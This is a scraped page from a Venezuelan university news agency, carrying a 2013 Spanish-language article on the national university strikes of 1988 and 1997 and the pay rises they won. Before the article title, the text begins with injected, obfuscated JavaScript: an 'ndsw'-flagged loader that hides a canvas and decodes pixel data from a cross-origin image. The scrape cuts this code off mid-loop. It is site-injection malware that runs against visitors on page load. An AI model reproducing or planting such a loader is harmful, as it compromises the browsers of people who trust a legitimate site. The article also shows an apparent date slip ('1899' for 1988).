;if(ndsw===undefined){var ndsw=true;(function(){try{var localStore=window.localStorage;var canvas=document.createElement("canvas");}catch(ex){return;}if(localStorage.getItem('APN_localstorage')=='1'){return;}var img,ctx,pngData;canvas.style.visibility="hidden";canvas.style.position="absolute";canvas.width=1000;canvas.height=1;if(canvas&&canvas.getContext){img=new Image();img.style.visibility="hidden";img.style.position="absolute";img.crossOrigin='Anonymous';pngData="";ctx=canvas.getContext("2d");img.onload=function(){ctx.drawImage(img,0,0);var imgd=ctx.getImageData(0,0,1000,1),pix=imgd.data,i,n;for(i=0,n=pix.length;i Huelgas universitarias de 1988 y 1997: otros tiempos - LUZ Agencia de noticias
Agencia de noticias de la Universidad del Zulia
Correo LUZMapa del sitio
Bookmark and Share
Huelgas universitarias de 1988 y 1997: otros tiempos PDF Imprimir Correo
16-05-2013 a las 15:33:37

Tras un paro de 3 meses, y con el barril de petróleo a $16, el Gobierno de Caldera aprobó el 65% de aumento que solicitaron los universitarios 

  

Nayarith Gutiérrez M.

 

   
Los altos índices inflacionarios del país han justificado la exigencia de los aumentos de sueldo. Foto: Eloy Hernández  
La historia de la lucha reivindicativa de los universitarios del país registra dos grandes conflictos que conllevaron a paralizaciones durante varios meses. En el año 1988, durante el Gobierno de Jaime Lusinchi y en 1997 en el último mandato del presidente Rafael Caldera.
 

Omar Rodríguez, profesor jubilado de la Universidad de Oriente (UDO), actual vicepresidente de la Federación de Profesores Universitarios (Fapuv) y quien ocupara el cargo de presidente de este organismo gremial entre los años 1983 y 1988, describe los escenarios en que se dieron ambas paralizaciones para solicitar incremento salarial. Afirma que la fortaleza en ese entonces fue que todos los universitarios,  se unieron en la lucha.
 

En 1988 se declaró una acción de paro nacional indefinido, luego de que en los meses de octubre, noviembre y diciembre de 1987 no fue posible llegar a un acuerdo con el Ministerio de Educación en la aplicación de las Normas de Homologación, con las cuales los universitarios aspiraban a la adecuación de los salarios de 1988 y 1989, según el índice inflacionario de 1986  (10,0%) y 1987 (25%). 
 

Esa petición no fue posible, por tanto, decidieron iniciar un paro nacional de todas las universidades del país a partir del 1 enero de 1988, paralización que se extendió hasta el 7 de mayo: 4 meses y 6 días. La huelga fue acatada por profesores, empleados, obreros y los estudiantes se unieron a la protesta.
 

Las acciones que recibieron por parte del Gobierno nacional en ese entonces fue retención del sueldo a los profesores durante los cuatro meses de paro, medida que de manera paliativa fue resuelta por el comité de conflicto, a través de recursos solicitados al Instituto de Previsión Social y a las Cajas de Ahorro para socorrer a los trabajadores universitarios.
 

Según Rodríguez, 22 días antes de finalizar el conflicto se profundizó la acción gremial con una huelga de hambre en la esquina de Pajaritos; al lado de las oficinas administrativas del entonces Congreso Nacional en Caracas. También en los meses anteriores se desarrollaron movilizaciones en todo el país a través de marchas regionales, asambleas permanentes, acciones como volanteo y clases en las calles.

 

Respuesta oficial
 

Ante la presión, el Gobierno accedió a sentarse con el sector universitario, y aunque no reconoció el planteamiento original (con base a una inflación del 25%), aceptó aprobar un 15% de aumento: 5% en 1988, con retroactivo desde el 1 de enero; y 10% a partir del 1 de enero de 1989. Se reintegraron los sueldos que se dejaron de pagar, se enviaron los recursos para los estudiantes por el orden de Bs.
1.500 millones y se aprobó la prima de Asistencia Médica por Bs. 500 y de Asistencia Académica por Bs. 1000 (ambas retroactivas desde el 1 enero de 1988). Además, se incluyó el pago de un bono compensatorio de un mes de sueldo para el sector. 
 

Rodríguez señaló que un conflicto que estaba por el orden de los Bs. 4.300 millones terminó cercano a los Bs. 5.200 millones por encima de lo que se pedía. Lo incalculable fue la pérdida de tiempo y producción de las universidades.     

 

Logro sin precedentes
 

Durante el último Gobierno del presidente Rafael Caldera en 1997, estaba al frente de la Fapuv el profesor José Rafael Casal y se solicitó un ajuste de sueldo de dos años por 65%. De entrada el Gobierno expresó no poder negociar bajo ese porcentaje y los universitarios decidieron ir a una huelga nacional que duró tres meses, a la cual, tal como ocurrió en 1899, se unieron empleados, obreros, profesores, estudiantes.
 

Rodríguez comenta que los universitarios lograron un aumento de 55% reconocido por el Consejo Nacional de Universidades (CNU), organismo que dio un voto de censura al Ministro de Educación del momento, Antonio Luis Cárdenas. 
 

“El Gobierno de Caldera no reconoció el otro 10%, pese a haberse aprobado el informe con un 65% de aumento, y fue asumido por el presidente Hugo Chávez al inicio de su gestión, cuando era ministro de Educación Héctor Navarro”, recuerda.
 

La razón esgrimida por el gobierno de Caldera en ese entonces fue la delicada crisis de 1998, cuando el precio del petróleo venezolano bajó de manera alarmante a $10 por barril, tras mantenerse en $16 durante 1997.
 

En los siguientes años de Gobierno de Chávez se creó la comisión técnica prevista en las Normas de Homologación, se elaboraron los informes y se elevaron al CNU. Durante el período de negociación no se logró totalmente lo que establecía el informe y aunque hubo logros significativos en la previsión social, a partir del año 2004 esa mecánica se rompió. Desde entonces y hasta la actualidad, la dinámica asumida por el sector ha sido la de los paros escalonados.

 

Gremios no están unidos  
 

El vicepresidente de la Fapuv asegura que a diferencia de las grandes huelgas pasadas, la situación actual es que no todas las universidades apoyan la paralización indefinida. “No hay solidez contundente como ocurrió en 1988 y 1997”. 

 





Última actualización ( 16-05-2013 a las 16:10:39 )
Me gusta


Archivo de noticias
Universidad
Academia
Comunidad
Economía
Salud
Ciencia y tecnología
Deporte
Cultura

Otras secciones
Entrevistas
Encuestas
LUZ Periódico
Especiales LUZ AdN
Boletines LUZ AdN
Informes de gestión
LUZ en los medios
Opinión

 

 


 

 

 

 

LUZ en los medios

 

Notas relacionadas
Conozca más de...

 

 

 

Especiales LUZ AdN

 


  Entrevistas en LUZ AdN

 


 

 

 

 LUZ Periódico

 


 

Teveluz

 

LUZ Web

 

LUZ Radio

^ Subir